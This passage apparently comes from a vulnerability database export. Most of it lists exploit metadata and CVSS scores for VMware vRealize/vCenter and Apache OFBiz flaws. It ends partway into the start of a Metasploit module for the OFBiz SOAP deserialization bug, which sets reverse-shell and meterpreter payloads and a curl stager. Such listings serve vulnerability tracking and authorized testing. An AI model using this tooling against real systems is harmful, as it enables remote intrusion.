cred leak\n\n#First configur...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T13:33:45", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2022-07-23T07:58:27", "id": "35114B1B-006F-5732-8E42-9E8643B61C2A", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# VMWare-CVE-2021-21975\n\n# VMWare-CVE-2021-21975 SSRF vulnerabil...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-10T12:36:07", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware 
Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975"], "modified": "2021-12-03T00:24:52", "id": "7663BC50-C08E-5741-B771-BE50606E7B78", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}, {"lastseen": "2022-06-28T20:31:25", "description": "# CVE-2021-22005-metasploit\nthe metasploit script(POC/EXP) about...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-02T07:32:04", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2021-22005"], "modified": "2022-06-28T16:06:55", "id": "D7E6498B-522A-5F6E-ADCF-45E60A0788D9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-16T20:01:22", "description": "# CVE-2021-22005-\nCVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-25T07:19:42", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-07-16T13:57:16", "id": "97046A6F-8428-5DCF-88B4-4101351D637C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T23:03:13", "description": "# VMWare-C...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-23T19:11:22", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-08-17T19:20:50", "id": "5ADFCBCF-BEC4-5B45-818D-9C25EAF0F9AF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T19:04:56", "description": "# CVE-2021-22005\n\nVMware vCenter RCE CVE-2021-22005 one-liner ma...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-23T00:09:03", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": 
"PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-10-13T21:13:47", "id": "B31B0189-453E-5CA5-8FF3-5DC05043BE98", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-31T08:46:10", "description": "# cve-2021-22005-exp\n\n## 0x01 \u6f0f\u6d1e\u7b80\u4ecb\n2021\u5e749\u670821\u65e5\uff0cVMware\u53d1\u5e03\u5b89\u5168\u516c\u544a\uff0c\u516c\u5f00\u62ab\u9732\u4e86...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-18T08:18:50", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2023-05-31T06:39:39", "id": "D97D0E5A-B60D-5B5B-93AC-3D6249E5A9C5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, 
{"lastseen": "2023-05-27T15:44:58", "description": "# CVE-2021-22005\n# VMware vCenter Server\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\n\n## Code By:Jun...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-27T08:36:21", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2023-02-27T01:06:12", "id": "AEAB39A1-AAEB-53A6-836E-E4994CBDABF7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-13T17:42:26", "description": "# CVE-2021-22005 - VMWare vCenter Server File Upload to RCE\n####...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": 
"NONE"}, "impactScore": 5.9}, "published": "2021-09-25T16:21:56", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-08-13T15:06:43", "id": "AAD2737A-E98E-59B4-8310-3DF28159B7F4", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:45:35", "description": "# CVE-2021-22005-metasploit\nthe metasploit script(POC/EXP) about...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-24T23:14:01", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Vcenter Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-11-09T18:14:11", "id": "6E42EC2D-B570-5376-884C-7C0566A1CA3D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T14:15:18", "description": "# CVE-2021-22005poc\nCVE-2021-22005 vcenter\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6279\u91cf\u9a8c\u8bc1poc\n\n\n\u4e00\u3001\u7528\u6cd5\n\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-15T13:11:04", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2022-03-15T03:51:38", "id": "9B660139-27C8-56B8-B9E2-8124D0E9F502", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T18:53:42", "description": "# 
ofbiz-poc\nCVE-2020-9496\u548cCVE_2020_9496\u5229\u7528dnslog\u6279\u91cf\u9a8c\u8bc1\u6f0f\u6d1e...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-13T13:28:15", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Ofbiz", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9496", "CVE-2021-26295"], "modified": "2022-01-11T08:40:28", "id": "29FE8BBC-6003-591C-8E89-6836D0994CF1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "<b>[CVE-2021-21975] VMware vRealize Operations Manager API Serve...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-02T21:14:06", "type": 
"githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983", "CVE-2021-21975"], "modified": "2021-10-24T06:02:36", "id": "D5702470-2A4B-5116-9B9F-4001BDD6935C", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "## Impacted Products\r\n\r\n- VMware vRealize Operations 8.3.0\u30018.2.0...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T15:40:09", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983", "CVE-2021-21975"], "modified": "2021-11-08T08:21:55", "id": "29AADC8A-DEC3-59E3-BF20-A227E39A5083", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-19T19:57:08", "description": "# REALITY_SMASHER\nvRealize RCE + Privesc (CVE-2021-21975, CVE-20...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-04-06T23:24:38", "type": "githubexploit", "title": "Exploit for Server-Side Request Forgery in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21983", "CVE-2021-21975"], "modified": "2022-02-19T17:06:47", "id": "911A7F63-1DBC-54A3-820C-F8F19E006338", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-16T14:28:37", "description": "<b>[CVE-2021-21975] VMware vRealize Operations (vROps) Manager A...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", 
"attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-16T11:56:25", "type": "githubexploit", "title": "Exploit for Vulnerability in Vmware Vrealize Operations Manager", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2022-03-16T13:53:28", "id": "33268543-6217-5EB6-9E15-3AD5A03E3B8E", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T19:04:50", "description": "# CVE-2021-22005_PoC\nCVE-2021-22005_PoC\n\n\n\n\ngetshel...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-27T03:18:09", "type": "githubexploit", "title": "Exploit for Unrestricted Upload of File with Dangerous Type in Vmware Cloud Foundation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20050", "CVE-2021-22005"], "modified": "2021-12-18T07:16:48", "id": "1C9826FA-B0AD-5C2E-81E6-5842CAA51C4B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "metasploit": [{"lastseen": "2023-01-07T00:51:08", "description": "This module exploits a Java deserialization vulnerability in Apache OFBiz's unauthenticated SOAP endpoint /webtools/control/SOAPService for versions prior to 17.12.06.\n", "cvss3": {}, "published": "2021-03-30T22:18:16", "type": "metasploit", "title": "Apache OFBiz SOAP Java Deserialization", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-26295"], "modified": "2021-04-05T14:33:20", "id": "MSF:EXPLOIT-LINUX-HTTP-APACHE_OFBIZ_DESERIALIZATION_SOAP-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/apache_ofbiz_deserialization_soap/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n include Msf::Exploit::JavaDeserialization\n\n XML_NS = {\n 'serResponse' => 'http://ofbiz.apache.org/service/',\n 'soapenv' => 'http://schemas.xmlsoap.org/soap/envelope/'\n }.freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Apache OFBiz SOAP Java Deserialization',\n 'Description' => %q{\n This module 
exploits a Java deserialization vulnerability in Apache\n OFBiz's unauthenticated SOAP endpoint /webtools/control/SOAPService for\n versions prior to 17.12.06.\n },\n 'Author' => [\n 'yumusb', # original PoC\n 'Spencer McIntyre', # metasploit module\n 'wvu' # metasploit module\n ],\n 'References' => [\n [ 'CVE', '2021-26295' ],\n [ 'URL', 'https://github.com/yumusb/CVE-2021-26295-POC/blob/main/poc.py' ],\n [ 'URL', 'https://issues.apache.org/jira/browse/OFBIZ-12167' ]\n ],\n 'DisclosureDate' => '2021-03-22', # NVD publish date\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'CMDSTAGER::FLAVOR' => :curl,\n 'PAYLOAD' => 'linux/x64/meterpreter_reverse_https'\n }\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'DefaultOptions' => {\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n Opt::RPORT(8443),\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n # Send an empty serialized object\n res = send_request_soap('')\n\n unless res\n return CheckCode::Unknown('Target did not respond to check.')\n end\n\n messages = 